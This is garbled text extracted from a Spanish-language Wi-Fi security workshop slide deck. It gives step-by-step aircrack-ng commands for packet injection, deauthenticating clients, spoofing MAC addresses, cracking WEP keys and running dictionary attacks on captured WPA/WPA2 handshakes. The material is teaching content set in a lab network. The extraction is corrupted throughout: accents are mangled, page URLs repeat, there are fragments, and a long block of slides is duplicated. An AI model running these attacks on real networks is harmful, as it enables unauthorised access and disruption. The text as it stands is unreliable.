bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
